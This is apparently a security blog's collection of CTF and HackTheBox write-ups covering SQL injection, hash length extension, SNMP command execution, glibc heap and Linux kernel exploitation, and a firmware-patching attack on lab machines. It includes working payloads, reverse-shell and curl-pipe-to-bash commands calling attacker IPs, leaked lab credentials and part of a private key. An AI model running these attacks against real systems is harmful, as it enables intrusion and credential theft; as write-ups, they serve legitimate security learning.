injection: ' or (select case when (select substr(username,1,1) from users limit 1 offset 0) = 'a' then 'W' else load_extension('L', 0x1) end));--

query: insert into messages values ('' or (select case when (select substr(username,1,1) from users limit 1 offset 0) = 'a' then 'W' else load_extension('L', 0x1) end));--')

I wrote the following script to retrieve the admin username and hash with a simple linear brute, as the username probably will just be admin, and the hex charset is small enough:
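The same oracle can be reproduced locally with Python's built-in sqlite3 module. This is a sketch, not the original script. The table schema is an assumption, and the database is seeded with the admin hash recovered below. It relies on extension loading being disabled by default in Python's sqlite3, so load_extension() errors out as "not authorized" only when the CASE falls through to the ELSE branch. This assumes your SQLite build includes the load_extension() SQL function. The payload is the template above with the column and position filled in.

```python
import sqlite3
import string

def make_demo_db():
    """Local stand-in for the challenge database (schema is an assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users (username text, secret text)")
    db.execute("create table messages (message text)")
    db.execute("insert into users values ('admin', "
               "'f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105')")
    return db

def submit_message(db, message):
    """Vulnerable pattern: user input formatted straight into the query."""
    try:
        db.execute(f"insert into messages values ('{message}')")
        return True            # "success"
    except sqlite3.Error:
        return False           # load_extension() was evaluated and failed

def char_matches(db, column, pos, guess):
    payload = (f"' or (select case when (select substr({column},{pos},1) from users "
               f"limit 1 offset 0) = '{guess}' then 'W' "
               f"else load_extension('L', 0x1) end));--")
    return submit_message(db, payload)

def extract(db, column, charset):
    """Linear brute force, one character position at a time."""
    result = ""
    while True:
        pos = len(result) + 1
        hit = next((c for c in charset if char_matches(db, column, pos, c)), None)
        if hit is None:        # past the end: substr() returns '' and nothing matches
            return result
        result += hit

db = make_demo_db()
print(extract(db, "username", string.ascii_lowercase + string.digits))  # admin
print(extract(db, "secret", "0123456789abcdef"))
```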

I ended up receiving the following hash: f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105

But it's not crackable with any wordlist or rule combination I have... this is where the way the application signs and checks sessions comes in. Remember how it prepended the secret before hashing? Under these conditions, sha256 is vulnerable to the hash length extension attack. This post explains the attack much better, as I just ended up relying on the hash_extender tool. In our case, we know the hash function, the data, and the original signature, so all the conditions for this attack are met. We can append data and generate a valid signature without knowing the secret, and the appended data can make us admin since the session parser doesn't check for duplicate keys. The general gist is that the signature is the hash function's internal state after processing secret + data + padding. You can load that state back into the algorithm and continue hashing your appended data from there, which produces a valid signature for the extended input. This only works if you guess the secret's length correctly, since that length determines the padding.

Since the secret has a variable length, I wrote the following script to bruteforce a valid session:

Now, with a valid session, we can go to the admin functions and perform lfi.

With some requests, I also noticed the user flag (and the source code for the pwnable) in the user directory with payload ../../../../../../../../../home/user.

Recalling our earlier enumeration, I remembered the snmp port. Pulling out /etc/snmp/snmpd.conf, I saw the following:

Seeing the rw community string made me immediately think of RCE over snmp, which is very well documented here. To quote the article:

The SNMP community string is essentially a plaintext password that allows access to a device’s statistics and configuration.

Since there is a length limit to the payloads (255 chars for command) with nsExtend related operations, I ended up generating a shorter ssh key to give myself ssh access as the Debian-snmp user with the following commands:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /bin/sh 'nsExtendArgs."command"' = '-c "echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC1VxdqPOpZvaJtuvtTMZJlchmQCLw8cC0tvD79eSlaL0hsS0XRFRaAKFf55UP1SarbED+teHFQUPbLa6uJlBxJQrPLQfujmo6su7P2jGPDZrwxIgKA7Om8cUvLXuNdHrTVwze68z7QBCIi6m1ofHBvZJOdWMt6O0idpybWefz7Cw== root@kaliVM > /dev/shm/w"'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /bin/sh 'nsExtendArgs."command"' = '-c "cat /dev/shm/w > /var/lib/snmp/.ssh/authorized_keys"'

Remember to trigger it each time with: snmpwalk -v 2c -c SuP3RPrivCom90 10.10.10.195 nsExtendObjects

When you lfi the source code of the pwnable (note_server.c) earlier on, you can see that it opened its port on 5001, so we can port forward it out:

ssh -N -L 5001:127.0.0.1:5001 Debian-snmp@intense.htb -i key

However, we still need libc and the binary, and from the lfi on passwd, we know Debian-snmp's shell is /bin/false. So I ended up popping a shell with the following commands so I could transfer files out (we had to use nohup to prevent snmp from hanging and then crashing, and some fiddling was required to get the commands working):

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' =  'wget http://10.10.14.9/nc -q -O /dev/shm/nc'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' = 'chmod +x /dev/shm/nc'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' = '/dev/shm/nc 10.10.14.9 1337 -e /bin/sh'

The following was the source:

This is just a variation of the previous forking stack overflow server pwns I've written extensively about in both my Rope and Patents writeups, so I'll skim through this pwn. It's another forking note app, with PIE, FULL RELRO, and a canary (which is trivial to beat once you leak it, since forked children share the same canary).

Your options are ‘\x01’ for write, ‘\x02’ for copy, and ‘\x03’ for show. When you write data, you tell it the length, and it adds the length to the current index to check whether the sum is over the buffer size. If it's not, you can send in data of the specified length, which is stored in the note char array starting at the current index, and the index is incremented by the size you requested. Do note that the requested size is sent as a single byte.

For copy, you get 2 bytes to specify an offset, and the offset is checked to be between 0 and the current index. However, the copy size isn't checked, so there is a potential overflow when it copies from the note buffer at the specified offset to the note buffer at the current index. It also increases the index by the copy size, so we can read out of bounds with this as well (as show doesn't check the index).

For show, there isn't much to know, except that it writes out the data and returns, so the fork ends.

In my exploit, I first increased the index to 1024 and abused copy's lack of checks to extend the index, so that the buffer printed with option 3 leaks the canary, stack addresses, and the PIE base. Then I wrote a ROP chain to leak libc, with proper padding and the canary in front, at the start of the buffer (adjusted so the index ends up at 1024). I then had it copy the length of the ROP chain from offset 0 to the current index (1024), overflowing the saved return address so that triggering a return with show leaks libc. I then applied the same principle to dup2 the file descriptors and pop a shell. Here is my final script:


And that should get us a root shell! Thanks once again to sokafr for the fun box, and to pottm and bjornmorten for giving my writeup a read-through before publishing.

Sunday, October 4, 2020

CUCTF 2020 Dr. Xorisaurus Heap Writeup (glibc 2.32 UAF)

Here is my writeup for my 2.32 glibc heap challenge (Dr. Xorisaurus) from CUCTF 2020; make sure to check out the writeup for my kernel challenge Hotrod as well!

One important concept to note about glibc 2.32 is the new safe-linking mechanism on the singly linked lists. This new protection scheme is discussed in depth here. Basically, for singly linked freelists (fastbins and tcache bins), free chunk fd pointers are obfuscated with the following scheme: (stored pointer) = (address of the fd pointer >> 12) ^ (fd pointer). With a heap leak, this protection can be easily bypassed, since heap behavior in glibc is predictable, and that is what this challenge revolves around. Bruteforcing, or leaking a copy of the stored pointer and applying some basic crypto knowledge, can also recover the original data in some cases (especially when the chunks in the list are close together).
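The scheme fits in a few lines of Python. `protect` and `reveal` mirror glibc's `PROTECT_PTR`/`REVEAL_PTR` macros; `demangle` is a sketch of the "basic crypto" recovery and assumes the fd field and the pointer it holds are in the same 4 KiB page (so both share the same bits above bit 12). All addresses are made up.

```python
def protect(pos: int, ptr: int) -> int:
    """Value stored in a tcache/fastbin fd field located at address pos."""
    return (pos >> 12) ^ ptr


def reveal(pos: int, stored: int) -> int:
    """Inverse of protect(): XORing with the same key recovers the pointer."""
    return (pos >> 12) ^ stored


def demangle(stored: int) -> int:
    """Recover ptr from stored = (ptr >> 12) ^ ptr without knowing pos.

    Only valid when pos >> 12 == ptr >> 12. The top 12 bits are unmasked,
    and each recovered 12-bit window un-XORs the window below it.
    """
    mask = 0xFFF << 52
    while mask:
        stored ^= (stored & mask) >> 12
        mask >>= 12
    return stored


# Last chunk in a list (fd == NULL): the stored value is just pos >> 12, so
# shifting a leak of it left by 12 gives the chunk's page (the heap base if
# the chunk lives in the heap's first page).
fd_field = 0x55555555A2A0  # hypothetical address of a freed chunk's fd field
tail_leak = protect(fd_field, 0)
next_chunk = 0x55555555A2C0  # hypothetical fd target in the same page
stored = protect(fd_field, next_chunk)
```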

In this challenge, we were given a libc with debug symbols, linker, and patchelf'd binary with the following protections:

Now, when reversing this binary, one should find 4 features. 

According to the menu, you can fill a glass, examine a glass, drain a glass, and swap the contents of a glass. There is also an initial SIGALRM alarm at the beginning, and you can only have a maximum of 25 glasses. Filling a glass is equivalent to an allocation: it finds a free index in the global glasses array, asks for a size between 0x60 and the larger fastbin sizes, and reads in some data. Examining a glass is useful for leakage, as it just puts() the content of the chunk; note that examinations can only be used twice (which can be assumed to be for a libc leak and a heap leak). Draining is the equivalent of a free, and it is safe as it nulls out the pointer in the global array. You can use this feature as many times as you like, but once you swap contents (feature 4), you can only free one more time. As for the swap function, it frees a chunk and then immediately reallocates based on 2 size choices. After the allocation, the binary reads in 8 bytes. This is where the 8 byte UAF comes in: the conditional is poorly written, so if you select an invalid choice, there is no re-allocation and you end up reading into the freed chunk's metadata (take a look at the decompilation below). Now let's plan out our exploit:

One might make the mistake of thinking of using swap to create a double free, but the 8 byte UAF only reaches the fd pointer and won't let you change the tcache key, so freeing that chunk again will fail free()'s tcache double free check. Some might think about filling tcache and then applying a fastbin dup attack, but being limited to one more free after swapping prevents the bypass of the fastbin double free check.

To obtain a leak, one might be tempted to just free a chunk and then reallocate it to see the obfuscated pointer (and then shift it left by 12 bits to recover the heap base). However, the read call during the allocation requires at least one byte (unless a pty is enabled server side), so the low byte of the stored value gets overwritten; together with the 12 bits lost to the shift, 5 nibbles of the heap address will be missing. Since the heap base is page aligned, this leaves 1 byte of entropy on the leak, but a proof of work on 3 bytes of a random sha256 hash is required on remote, so bruteforcing isn't very feasible.

A better way to obtain a leak is to abuse the behavior of scanf. When scanf reads in a large run of characters that match its format specifier, it begins to allocate buffers on the heap. For example, if we send in 0x500 '1's, scanf will make a largebin-sized allocation request. As anyone familiar with the heap might know, a largebin-sized allocation triggers malloc_consolidate() (source), which goes through the freed fastbins and consolidates them into the unsorted bin (source). This malloc_consolidate() is the basis for another type of attack known as fastbin consolidation, which is discussed here in better depth. After malloc_consolidate(), the large allocation request then causes the chunk in unsorted to be sorted into a largebin. On the next request, the chunk will be sorted into unsorted again, from which we can easily grab a heap leak (feel free to debug this out when I attach my exploit later on if this seems confusing). This method of leaking only came up after my teammate c3bacd17 found an unintentional bypass in one of my other challenges.

Once we have the leak, some basic math lets us abuse the 8 byte UAF to maliciously corrupt the obfuscated pointer. Note that 2.32 malloc()'s safe linking mechanism also checks that the deobfuscated pointer is aligned. Because of this and the fastbin size check, we can no longer use the unaligned trick for fastbin dup here. We will have to rely on tcache poisoning instead, and an evil obfuscated pointer can be created by xoring the address of the fd field, right shifted by 12 bits, with the target location.
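A minimal sketch of building that evil pointer, assuming we already know the address of the fd field we overwrite (from the heap leak). The function name and addresses are hypothetical. It also refuses targets that are not 16-byte aligned, since 2.32's tcache_get() aborts on those. Keep in mind that since 2.30 malloc() only takes from a tcache bin whose count is non-zero, so the bin should still hold more than one entry when you reach the forged one.

```python
import struct


def forge_tcache_fd(fd_addr: int, target: int) -> bytes:
    """8 bytes to write over a freed tcache chunk's fd (glibc 2.32 safe linking).

    fd_addr: address of the fd field being overwritten.
    target:  where a later malloc() from this bin should return.
    """
    if target & 0xF:
        # tcache_get() rejects misaligned entries
        # ("malloc(): unaligned tcache chunk detected").
        raise ValueError("target must be 16-byte aligned")
    return struct.pack("<Q", (fd_addr >> 12) ^ target)


fd_addr = 0x55555555B2A0  # hypothetical fd field of the UAF'd chunk
target = 0x7FFFF7FC4E40  # hypothetical aligned target, e.g. near __free_hook
payload = forge_tcache_fd(fd_addr, target)
```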

I ended up targeting __free_hook and changed it to system, then "freed" a chunk with the string "/bin/sh" on it to pop a shell. As for the proof of work on remote, it can easily be handled by the proofofwork python library that automatically generates a proof.

The following is my final exploit with comments:



Hope everyone enjoyed this challenge and writeup! Feel free to let me know if anything needs to be clarified or if anything explained is incorrect. Congrats to lms of Dakota State for blooding this challenge as well!

For those interested in trying this challenge out, it is archived in the CUCTF repos.

CUCTF 2020 Hotrod Kernel Writeup (Userfaultfd Race + Kernel UAF + Timerfd_Ctx Overwrite)

Recently, I made some pwn challenges for my teammate Chirality, who helped organize CUCTF 2020: Dr. Xorisaurus (glibc 2.32 heap) and Hotrod (kernel heap and race). I thought it would be nice to share my writeups for each. You should also check out Chirality's kernel heap challenge for CUCTF, called BYOD.

Before I start, I would like to acknowledge and give appropriate credit to all the links (posted throughout this article) I studied off of to make both this challenge and my exploit possible.

If you have done plenty of glibc heap exploitation before, there is one important idea you should note about kernel heap exploitation. Rather than relying completely on kernel heap feng shui (even though the allocators are much simpler in kernel), it's oftentimes better to utilize certain structures with function pointers for leaks and RIP control. The basis of this challenge is to use a race condition to create a UAF scenario, from which you can hijack timerfd_ctx structures to take control of RIP.

Opening this challenge up, it looks like a standard kernel pwn setup: a file system, a bzImage, and a qemu launch script are given. The following two commands will be very handy for manipulating the file system for debugging/analysis purposes:

The qemu launch script is the following:

This tells us that SMEP, KPTI, and KASLR are enabled, but there is no SMAP (which simplifies this a lot).

We can also use vmlinux-extract to help extract the kernel from its compressed file. The driver itself is hotrod.ko based on the startup script (and the name of the challenge). Now, let's do a quick analysis of the driver.

Like many other standard CTF kernel challenges, a miscdevice is created during initialization and a mutex is also initialized. The device's file_operations struct only populates the unlocked_ioctl field. Looking through hotrod_ioctl, one can also infer that there is a global struct, located at 0x7e0 relative to module base, storing both the size as an unsigned long and a pointer to an allocated chunk. The handler implements add, show, delete, and edit, each of which can only be used once (and you only get one hotrod total). Alloc occurs when the ioctl command is 0xBAADC0DE.

It checks whether you have already attempted an allocation and whether the hotrod has already been populated. If not, it allocates a chunk for the hotrod and sets its size to the argument passed in (the size must fall within the 0xd0 to 0xe0 range). There doesn't seem to be a bug here. Delete occurs when the ioctl command is 0xC001C0DE.

Again, proper checks are ensured, and the hotrod is zeroed out. This feature can also only be used once. Viewing occurs with ioctl command 0x1337C0DE.

Again, it seems quite safe. We can use this for a leak after we allocate and free certain kernel structures, though, since kmalloc() doesn't zero out memory. Lastly, edit occurs with command 0xDEADC0DE.


Again, it seems pretty safe. Like the viewing function, it interprets the argument as a pointer to a user hotrod struct. The sizes for editing (as well as for viewing earlier on) are both checked (so no out-of-bounds accesses or overflows). In edit's case, if the size check passes, it proceeds to copy the user's data into the kernel hotrod's car.

Overall, this module looks quite safe. Where exactly could the bug be? Well, in this ioctl handler, the mutexes were never used, opening this up to race conditions.

Due to the checks on sizes and the restriction to use each feature only once, a good race strategy would be to launch edit in one thread and, in another thread, quickly free the chunk and allocate another kernel structure over it, so that edit's second copy_from_user() runs after the chunk has been freed but still writes through the stale pointer edit already loaded. A great way to race reliably is with the userfaultfd syscall. With userfaultfd, we can register a page fault handler over a page we mmap in userspace; even when the page fault comes from the kernel accessing that page, our handler runs, so we can hang the kernel thread, run the code meant for the race, and then unblock it with a UFFDIO_COPY ioctl where uffdio_copy.mode is not set. This is an extremely common technique for reliable kernel races, with several articles and CTF challenges covering this concept (such as the famous Balsn CTF KrazyNote challenge):

https://blog.lizzie.io/using-userfaultfd.html

https://bbs.pediy.com/thread-217540.htm

https://duasynt.com/blog/linux-kernel-heap-spray



There does seem to be a recent hardening against this method of attack, as mentioned here, but it is not enabled by default for compatibility reasons.

From our exploit's perspective, we can have one thread call edit with a user hotrod struct whose data (or "car") pointer points to a page on which we set up a userfaultfd handler. Then, during edit's second copy_from_user(), it page faults when it tries to copy from our pointer, and our handler takes over, freeing the chunk and allocating other kernel structures over the same region. Then, you can unblock the thread by copying over the data we want placed there. Personally, I kept all the original data in the copy (to avoid corrupting the kernel structure) except for one of the function pointers, which I changed to a stack pivot. After the unblock, the code resumes and everything goes back to "normal," until the overwritten function pointer is triggered.

Due to our structure size, many of the common structures can't be used. However, timerfd_ctx can be quite a useful struct; we can allocate it with timerfd_create() using the CLOCK_REALTIME option (other clocks will also work) followed by a timerfd_settime() call. Using this structure, we can both get a leak and control RIP via the field that stores the function pointer to timerfd_tmrproc(). The function pointer executes after a time period which you control in the itimerspec struct. This structure has been documented before in ptr-yudai's article about useful kernel structures, in this paper about exploitable structures, and in GNote from TokyoWesterns 2019. Note that, for me, any subsequent sleep calls with the corrupted structure would fail, so I hung the thread with a getchar() while waiting for the function pointer to trigger.
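A rough Python/ctypes sketch of just this allocation step (the actual exploit was written in C): each armed timerfd makes the kernel allocate a timerfd_ctx. The helper names and the 60 second expiry are illustrative choices, not values from the exploit, and it assumes Linux with a C library that exports `timerfd_create`/`timerfd_settime`.

```python
import ctypes
import os

libc = ctypes.CDLL(None, use_errno=True)  # symbols of the already-loaded C library
CLOCK_REALTIME = 0


class Timespec(ctypes.Structure):
    _fields_ = [("tv_sec", ctypes.c_long), ("tv_nsec", ctypes.c_long)]


class Itimerspec(ctypes.Structure):
    _fields_ = [("it_interval", Timespec), ("it_value", Timespec)]


def _check(ret: int) -> int:
    if ret < 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err))
    return ret


def arm_timerfd(seconds: int) -> int:
    """Create and arm one timerfd (kernel side: one timerfd_ctx)."""
    fd = _check(libc.timerfd_create(CLOCK_REALTIME, 0))
    spec = Itimerspec()
    spec.it_value.tv_sec = seconds  # one-shot expiry; it_interval stays zero
    _check(libc.timerfd_settime(fd, 0, ctypes.byref(spec), None))
    return fd


def spray_timerfds(count: int, seconds: int = 60) -> list:
    return [arm_timerfd(seconds) for _ in range(count)]
```

A long expiry keeps the timers from firing while the leak and the race are being set up; closing the fds frees the structures again.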

Since the kernel randomizes the freelist, I had to spray these structs into the same kmalloc slabs. Then, I freed the last sprayed chunk and immediately made hotrod allocate there (freeing one chunk and immediately reallocating didn't seem to be affected by freelist randomization), so we can grab the leak reliably; otherwise, our hotrod might not be allocated over a timerfd_ctx struct.

With the KASLR leak, we can rebase the entire kernel relative to the startup_64 symbol in kallsyms and then use the aforementioned race to change the function pointer to a stack pivot gadget; we can pivot to a userspace stack as there is no SMAP. Note that you need to specify a valid address range for ropper/ROPgadget to search for gadgets; otherwise, they'll find gadgets that aren't in executable sections of the kernel. Take a look at the example below:

Since there is KPTI and SMEP, the traditional SMEP bypass of changing the CR4 register won't work; KPTI fully isolates user page tables from kernel page tables by switching between the two sets via bit 12 of the CR3 register (the userspace portion of the kernel page tables is set to NX, and the userspace page tables only additionally map what is necessary to enter and exit the kernel). Instead, it is better to rely on a KPTI trampoline (swapgs_restore_regs_and_return_to_usermode) and have it fix CR3 for us so we can go back; this functionality exists in the kernel because it needs to handle the transition for routines like syscalls. I usually add 0x16 to its address so I can skip all the initial pops and start right at movq %rsp, %rdi. Using this trampoline, combined with a commit_creds(init_cred) beforehand to change my uid to 0, I can then return to whichever function I choose in my userspace code with root privileges. Of course, I needed to specify the cs, ss, rflags, and stack for the trampoline to return to as well (specifically, at that location, it expects RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS); I just used the values I saved beforehand in the userspace process.
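Putting the rebasing and the return path together, here is a Python sketch of the address math and the chain layout that would sit on the pivoted userspace stack. Every offset in `OFFSETS` is a hypothetical placeholder (read the real ones from kallsyms or the extracted vmlinux of the target build); only the +0x16 skip and the frame order (RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS) come from the writeup, and the 0x16 is specific to that kernel build.

```python
import struct

# Offsets from startup_64: all hypothetical placeholders.
OFFSETS = {
    "timerfd_tmrproc": 0x2C1230,
    "pop_rdi_ret": 0x001518,
    "commit_creds": 0x0BB5B0,
    "init_cred": 0xC4A2E0,
    "swapgs_restore_regs_and_return_to_usermode": 0xE00A30,
}
TRAMPOLINE_SKIP = 0x16  # skip the initial pops, land on movq %rsp, %rdi


def kernel_base_from_leak(leaked_tmrproc: int) -> int:
    base = leaked_tmrproc - OFFSETS["timerfd_tmrproc"]
    # KASLR slides the kernel by page-aligned amounts; low bits set means a wrong offset.
    if base & 0xFFF:
        raise ValueError(f"unaligned kernel base {base:#x}")
    return base


def kpti_return_chain(base: int, user: dict) -> bytes:
    """commit_creds(init_cred), then back to userspace via the KPTI trampoline.

    user holds rip/cs/rflags/rsp/ss saved in userspace before the race.
    """
    k = {name: base + off for name, off in OFFSETS.items()}
    qwords = [
        k["pop_rdi_ret"], k["init_cred"],  # rdi = &init_cred
        k["commit_creds"],
        k["swapgs_restore_regs_and_return_to_usermode"] + TRAMPOLINE_SKIP,
        0,  # RDI slot
        0,  # orig_ax slot
        user["rip"], user["cs"], user["rflags"], user["rsp"], user["ss"],
    ]
    return b"".join(struct.pack("<Q", q) for q in qwords)


base = kernel_base_from_leak(0xFFFFFFFFA02C1230)  # example leak
chain = kpti_return_chain(
    base,
    # example values; the real ones are saved from the running process
    {"rip": 0x401D10, "cs": 0x33, "rflags": 0x246, "rsp": 0x7FFC0000F000, "ss": 0x2B},
)
```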

In my case, I was not able to execve or perform many other functions without causing a kernel panic, so I ended up doing open/read/write in my function. I also had to halt the OS; otherwise, the kernel panics on the return, hangs, and somehow spikes my CPU usage to 100%. I'm not too sure why that happened, so if you know why, please let me know.

Below is my exploit with comments and linked resources:


To transfer the exploit to the remote instance, I compiled it statically with gcc, gzip'd it, and transferred it with base64 encoding and cat > exploit << EOF. It was still relatively large and took about 7 minutes to transfer, but if one really were working under time constraints, compiling against a more minimalistic libc like musl or uClibc could help. Here's the final result:

On a side note, one of my testers and teammates, D3v17, did manage to pop a shell by changing modprobe_path and then hanging the kernel thread with an int3 instruction when going back to userspace; he could then still run commands as root with the classic modprobe trick. However, this only had a 1 in 5 success rate, which can become an issue during a CTF because of the long transfer times.

If I made any mistakes in my explanations above, feel free to let me know so I can correct them. I'm still continuing to study the Linux kernel and find it quite fascinating! Thanks again to CUCTF for hosting the event!

For those interested in trying this problem out, it is archived in the CUCTF repos.

Saturday, June 27, 2020

Player2 HacktheBox Writeup


Player2 was a challenging but very fun box by MrR3boot and b14ckh34rt. The highlight of the box for me is the final 2.29 heap pwn! In my opinion, if there were no unintended routes, this would have been by far the hardest box so far, but some of these alternative solutions were never patched.

During initial enumeration, we find on player2.htb a link to product.player2.htb regarding the Protobs product. It's a login page, so it's time to hopefully find some creds. An initial nmap port scan also reveals the following ports: 22, 80, 8545. Going to port 8545, we see an invalid twirp route message, giving away the fact that twirp is used on this box. While dirbing player2.htb, we also come across the proto directory. At this point, the documentation basically told me what to do:

https://twitchtv.github.io/twirp/docs/curl.html
https://github.com/twitchtv/twirp/blob/master/docs/routing.md

From the proto directory, let's try to find some configuration info by fuzzing for the .proto file.  Using some different wordlists with wfuzz on /proto/FUZZ.proto, I came across generated.proto:

syntax = "proto3";

package twirp.player2.auth;
option go_package = "auth";

service Auth {
  rpc GenCreds(Number) returns (Creds);
}

message Number {
  int32 count = 1; // must be > 0
}

message Creds {
  int32 count = 1;
  string name = 2;
  string pass = 3;
}

Note how twirp documentation mentions the route as the following:

POST /twirp/<package>.<Service>/<Method>

From the source above, the route will be twirp.player2.auth.Auth/GenCreds... some nice credentials should come from here!

Following the twirp documentation for curl, I played around and sent a request to the service route in the documented format.

curl -X POST "http://player2.htb:8545/twirp/twirp.player2.auth.Auth/GenCreds" --header "Content-Type:application/json" --data '{}'
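The same call can be built in Python with only the standard library, as a sketch: `twirp_request` is a hypothetical helper that formats the documented route POST /twirp/<package>.<Service>/<Method> with a JSON body, and it only builds the request without sending it.

```python
import json
import urllib.request


def twirp_request(base_url: str, package: str, service: str, method: str,
                  body: dict) -> urllib.request.Request:
    """Build (but do not send) a Twirp JSON call."""
    url = f"{base_url}/twirp/{package}.{service}/{method}"
    return urllib.request.Request(
        url,
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


req = twirp_request("http://player2.htb:8545", "twirp.player2.auth", "Auth",
                    "GenCreds", {})
# urllib.request.urlopen(req).read() would send it, like the curl command above.
```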

However, we end up getting a lot of different creds, and most of them don't work. I received the following:
{"name":"snowscan","pass":"Lp-+Q8umLW5*7qkc"}
{"name":"snowscan","pass":"ze+EKe-SGF^5uZQX"}
{"name":"jkr","pass":"tR@dQnwnZEk95*6#"}
{"name":"mprox","pass":"ze+EKe-SGF^5uZQX"}
{"name":"jkr","pass":"XHq7_WJTA?QD_?E2"}

After trying some different combinations, I determined that the following worked:
jkr:Lp-+Q8umLW5*7qkc

However, once we log in, it asks for an OTP. It tells us that we can either use the OTP that was sent to our mobile or backup codes. Dirb had originally turned up an api path, and since this page is called totp (a type of OTP), plugging in /api/totp actually worked. Playing around, there seems to be an “action” parameter on the api. After a while, I figured out that sending the logged-in session id along with a request for “backup_codes” (a logical name for what we are looking for) gave us a working code.

curl -X POST "http://product.player2.htb/api/totp" --header "Content-Type:application/json" -d '{"action":"backup_codes"}' --cookie "PHPSESSID=06plq8egcf5e8eijvhs8abjs7q"

{"user":"jkr","code":"29389234823423"}

After rooting the box, hevr pointed out that there should be a type juggling attack here as the 2FA bypass:

curl -X POST "http://product.player2.htb/api/totp" --header "Content-Type:application/json" -d '{"action":0}' --cookie "PHPSESSID=06plq8egcf5e8eijvhs8abjs7q"

The next page mentions a PDF and links to a firmware download, noting that the firmware is signed. Extracting the binary file from the tar, I opened it up in a hex editor and saw the ELF header appear 64 bytes into the file. It seems safe to assume that the first 64 bytes are the signature. Let's strip them: dd if=Protobs.bin bs=64 skip=1 of=firmware.
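The same split in Python, as a sketch that also checks the assumption before trusting it: if the ELF magic is not at offset 64, the layout guess is wrong. The function name is hypothetical.

```python
SIG_LEN = 64
ELF_MAGIC = b"\x7fELF"


def split_signed_firmware(blob: bytes) -> tuple:
    """Return (signature, elf) for a file whose ELF image starts at offset 64."""
    if blob[SIG_LEN:SIG_LEN + len(ELF_MAGIC)] != ELF_MAGIC:
        raise ValueError("no ELF header at offset 64")
    return blob[:SIG_LEN], blob[SIG_LEN:]


# Usage: sig, elf = split_signed_firmware(open("Protobs.bin", "rb").read())
```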

While reversing it, I noticed how the main function called another function, which in turn called system on a string.

|           0x004013c9      55             push rbp
|           0x004013ca      4889e5         mov rbp, rsp
|           0x004013cd      4883ec10       sub rsp, 0x10
|           0x004013d1      64488b042528.  mov rax, qword fs:[0x28]    ; [0x28:8]=-1 ; '(' ; 40
|           0x004013da      488945f8       mov qword [local_8h], rax
|           0x004013de      31c0           xor eax, eax
|           0x004013e0      488d3dbd0c00.  lea rdi, qword str.stty_raw__echo_min_0_time_10 ; 0x4020a4 ; "stty raw -echo min 0 time 10"
|           0x004013e7      e884fcffff     call sym.imp.system         ; int system(const char *string)
|           0x004013ec      e8bffcffff     call sym.imp.getchar        ; int getchar(void)
|           0x004013f1      8945f4         mov dword [local_ch], eax
|           0x004013f4      837df41b       cmp dword [local_ch], 0x1b
|       ,=< 0x004013f8      7416           je 0x401410
|       |   0x004013fa      488d3dc00c00.  lea rdi, qword str.stty_sane ; 0x4020c1 ; "stty sane"
|       |   0x00401401      e86afcffff     call sym.imp.system         ; int system(const char *string)
|       |   0x00401406      bf00000000     mov edi, 0
|       |   0x0040140b      e8c0fcffff     call sym.imp.exit

We can patch the binary with dd to call system on a different string while keeping the 64 byte signature in front:

First, find the offset of the first string containing stty:
strings -t d Protobs.bin | grep stty

Then, I created a “malicious” file whose contents the next dd writes over the string. It contained the following:
curl 10.10.14.7/z | bash

The “z” on my side is just a shellscript containing the following:
curl http://10.10.14.7/nc -o /tmp/nc
chmod +x /tmp/nc
/tmp/nc 10.10.14.7 1337 -e /bin/sh

The reason I kept the original command so small was because I was being cautious about messing up the binary with a string that is too long.

Finally, the patch itself:
dd if=malicious of=Protobs.bin obs=1 seek=8420 conv=notrunc
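For comparison, a Python sketch of the same in-place patch. `patch_command` is a hypothetical helper; unlike the dd command, it pads the new command with NUL bytes up to the original string's length, so no tail of the old command is left for system() to run, and it refuses replacements that would grow past the original string.

```python
def patch_command(blob: bytes, old: bytes, new: bytes) -> tuple:
    """Overwrite the C string `old` inside blob with `new`, keeping the file size.

    Returns (patched_blob, offset); offset matches what `strings -t d` reports.
    """
    off = blob.find(old)
    if off < 0:
        raise ValueError("original string not found")
    if len(new) > len(old):
        raise ValueError("replacement longer than the original string")
    padded = new + b"\x00" * (len(old) - len(new))
    return blob[:off] + padded + blob[off + len(old):], off


# Usage sketch:
# data = open("Protobs.bin", "rb").read()
# patched, off = patch_command(data, b"stty raw -echo min 0 time 10",
#                              b"curl 10.10.14.7/z | bash")
```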

Uploading this should pop us a shell back as www-data.
Looking in /etc/passwd, there are two potential users to go for: egre55 and observer. I also noticed an account for the mosquitto service, which is running on port 1883. Reading around, its $SYS topics were quite interesting.

To quote the article, $SYS topics are a special class of topics under which the broker publishes data, typically for monitoring purposes. $SYS topics are not a formal standard but are an established practice in MQTT brokers.

Going to it with the following command:
mosquitto_sub -h localhost -p 1883 -v -t '$SYS/#'

We end up seeing an SSH key getting dumped after a while:

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA7Gc/OjpFFvefFrbuO64wF8sNMy+/7miymSZsEI+y4pQyEUBA
R0JyfLk8f0SoriYk0clR/JmY+4mK0s7+FtPcmsvYgReiqmgESc/brt3hDGBuVUr4
et8twwy77KkjypPy4yB0ecQhXgtJNEcEFUj9DrOq70b3HKlfu4WzGwMpOsAAdeFT
